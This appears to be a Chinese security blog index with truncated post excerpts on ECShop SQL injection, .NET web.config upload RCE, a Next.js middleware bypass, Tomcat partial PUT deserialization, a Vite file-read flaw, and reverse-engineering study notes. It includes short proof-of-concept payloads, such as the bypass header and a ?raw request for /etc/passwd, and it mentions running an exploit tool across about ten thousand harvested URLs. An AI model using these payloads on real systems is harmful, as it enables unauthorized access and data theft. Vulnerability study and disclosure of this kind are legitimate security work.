Ecshop SQL注入漏洞(CNVD-2025-07678)
漏洞介绍12ShopeX ECShop是中国商派(ShopeX)公司的一个开源商城系统。支持PC+H5+APP+小程序商城,源码免费下载体验,适合企业开发搭建商城。ECShop存在SQL注入漏洞,该漏洞源于user.php文件缺少对外部输入SQL语句的验证,攻击者可利用该漏洞查看、添加、修改或删除后端数据库中的信息。 影响版本1v4.1.19 <= Ecshop Fofa 指纹1body="themes/default/images/ec12.css" && body="themes/default/js/fdjs.json.js" && body="themes/default/js/cxjc0.js" 漏洞复现白盒审计:1、在 user.php 文件的,当$action值为wechat_token时,会接收用户输入的请求体并赋值给$callbackXml,$callbackXml会变为数组。2、接下来会执行call_user_func_array([$event,...
Yakit 热加载配合 captcha-killer-modified 教程
Yakit_API 手册1、下载 https://github.com/f0ng/captcha-killer-modified 12345678910111213app.add_routes([ web.post('/reg2', handle_cb), # 识别算数验证码 web.post('/reg', handle_cb2), # 识别常规验证码 web.post('/reg00', handle_cb00), # 识别纯整数0-9 web.post('/reg01', handle_cb01), # 识别纯小写英文a-z web.post('/reg02', handle_cb02), # 识别纯大写英文A-Z web.post('/reg03', handle_cb03), # 识别小写英文a-z + 大写英文A-Z web.post('/reg04',...
.NET 四种方法上传 web.config 绕过限制实现 RCE
参考文章 01. 作为.NET 脚本执行使用场景1当 IIS 服务器 仅支持 .NET 运行环境,且无法上传 .aspx、.asmx、.soap 等扩展名的文件时,攻击者可以尝试上传特制的 web.config,让其作为 .NET 脚本运行。 利用方式12345678910111213141516171819202122232425262728293031<!--攻击者可以上传以下 web.config 文件,使其 .config 文件扩展名被当作 .aspx 解析,并执行动态 .NET 代码:--><configuration> <system.web> <compilation defaultLanguage="cs"> <buildProviders> ...
Next.js 中间件权限绕过漏洞(CVE-2025-29927)
漏洞介绍12该漏洞成因是框架中用于标记中间件递归请求的特殊请求头x-middleware-subrequest可被用户伪造,导致中间件处理链被绕过,进而影响基于中间件实现的身份认证、重定向等关键安全逻辑。 影响版本12311.1.4 < Next.js ≤ 13.5.614.0 < Next.js < 14.2.2515.0 < Next.js < 15.2.3 验证 POC(添加特定请求头即可绕过验证进入登录后的界面)123x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware或者x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
Apache Tomcat远程代码执行漏洞(CNVD-2025-04973)
漏洞介绍12该漏洞影响启用了Partial PUT和DefaultServlet写入权限的环境,可能导致攻击者绕过路径校验,访问敏感文件或写入特定文件以执行恶意的反序列化,从而导致代码执行。 漏洞利用条件12345- 应用程序启用了DefaultServlet写入功能,该功能默认关闭- 应用支持了 partial PUT 请求,能够将恶意的序列化数据写入到会话文件中,该功能默认开启- 应用使用了 Tomcat 的文件会话持久化并且使用了默认的会话存储位置,需要额外配置- 应用中包含一个存在反序列化漏洞的库,比如存在于类路径下的 commons-collections,此条件 取决于业务实现是否依赖存在反序列化利用链的库 影响版本1239.0.0.M1 <= tomcat <= 9.0.9810.1.0-M1 <= tomcat <= 10.1.3411.0.0-M1 <= tomcat <= 11.0.2 利用过程 1234567891011121314151、利用 Yakit...
Vite开发服务器任意文件读取漏洞(CNVD-2025-05817)
漏洞介绍1Vite是Vite开源的一种新型的前端构建工具。Vite存在访问控制错误漏洞,该漏洞源于URL中的?raw??或?import&raw??可以绕过文件访问限制,返回任意文件内容。 影响版本123456.2.0 <= Vite <= 6.2.26.1.0 <= Vite <= 6.1.16.0.0 <= Vite <= 6.0.115.0.0 <= Vite <= 5.4.14Vite <= 4.5.9 Fofa 指纹1body="/@vite/client" 漏洞利用1234漏洞利用工具: https://github.com/ThumpBo/CVE-2025-30208-EXP验证POC: http://test.com/etc/passwd?raw http://test.com/etc/passwd?import&raw?? 利用过程1、将所有资产下载下来2、提取出 CSV 文件中的”资产的 URL 链接”,大概有一万多条 url3、利用 ThumpBo 师傅的...
Webgoat靶场学习笔记
GenralHTTP Basics数据包刨析: 1234567891011121314151617181920POST /WebGoat/HttpBasics/attack1 HTTP/1.1 # 请求方法为POSTHost: 127.0.0.1:8080 # 指定请求的服务器地址和端口号Accept-Language: zh-CN,zh;q=0.9 # 指定客户端接受的语言Sec-Fetch-Mode: cors # 指定请求的模式为CORSReferer: http://127.0.0.1:8080/WebGoat/start.mvc?username=zwy20040219 # 指定发起请求的原始地址Cookie: JSESSIONID=PI9_l7H3K0YI-JVKXE0_sM2kio6F7zkN8LX9inMn # 发送服务器之前存储的Cookie信息sec-ch-ua-mobile: ?0 #...
符号执行学习
参考jakespringer/angr_ctfZERO-A-ONE/AngrCTF_FITM: Angr CTF From introduction to mastery 概念1234567891011一个具有动态符号执行和静态分析的二进制分析工具,帮助我们自动化地分析和探索二进制文件中的执行路径。原理: 符号:符号是代表一组可能值的抽象。例如,一个符号 x 可能代表任意整数。 路径约束:在执行过程中,程序的控制流会根据条件分支创建不同的执行路径。符号执行会收集这些条件分支的约束,形成路径约束。执行过程: 初始化:符号执行开始时,程序输入(如函数参数、全局变量等)被赋予符号值。 执行:程序按照正常流程执行,但所有操作都是对符号值进行的。 路径探索:在遇到条件分支时,符号执行会探索所有可能的路径。对于每个分支,它都会假设条件为真和假,并分别记录下相应的路径约束。 约束求解:符号执行完成后,分析人员可以对这些路径约束进行求解,以找到满足特定路径的具体输入值。 使用 Angr 的步骤可以分为: 创建 project 设置...
逆向脱壳
前置知识壳的类型12压缩壳:压缩的目的是减少程序体积,如 ASPack、UPX、PECompact 等;加密壳:加密是为了防止程序被反编译(反汇编)、跟踪和调试,如 ASProtect、Armadillo、 EXECryptor、Themida、VMProtect。 加壳代码执行123451、保存入口参数加壳程序在初始化时会保存个寄存器的值,待外壳执行完毕后,再恢复各寄存器的内容,最后跳到原程序执行。通常用 pushad/popad、pushfd/popfd 指令对来保存与恢复现场环境。(pushad 用来保存所有通用寄存器的状态,而 pushfd 仅用来保存标志寄存器的状态,一般在 32 位中使用)2、获取壳本身需要使用的API地址在一般情况下,外壳的输入表中只有 GetProAddress、GetModuleHandle和 LoadLibrary 这3个API函数。甚至只有 Kernel32.dll 及 GetProcAddress。如果需要使用其他 API 函数,可以通过函数LoadLibraryA(W) 或 LoadLibraryExA(W) 将 DLL...
十分钟教你如何去除花指令
概念12345678 花指令又名垃圾代码、脏字节,英文名是junk code。花指令就是在不影响程序运行的情况下,往真实代码中插入一些垃圾代码,从而影响反汇编器的正常运行;或是起到干扰逆向分析人员的静态分析,增加分析难度和分析时间。0xe9:jmp0xe8:call0x90:nopcall xxx 相当于 push eip;jmp xxx;retn 相当于 ret 相当于 pop eip; 跳转到 eip 常用的两类反汇编算法121.线性扫描算法:逐行反汇编(无法将数据和内容进行区分)2.递归行进算法:按照代码可能的执行顺序进行反汇编程序。 花指令的识别123451. call目的地址畸形2. 跳转到某条指令的中间,IDA中形如地址+x的样子3. 大量不常见、不合理的指令(由于反汇编错位而出现)但反汇编错误并不意味着花指令,还可能是SMC(代码自解密) 常见花指令12341、jx 配合 jnx2、call 配合 pop3、call 配合 add esp, 44、call 配合 add [esp], n 配合 retn 视频链接
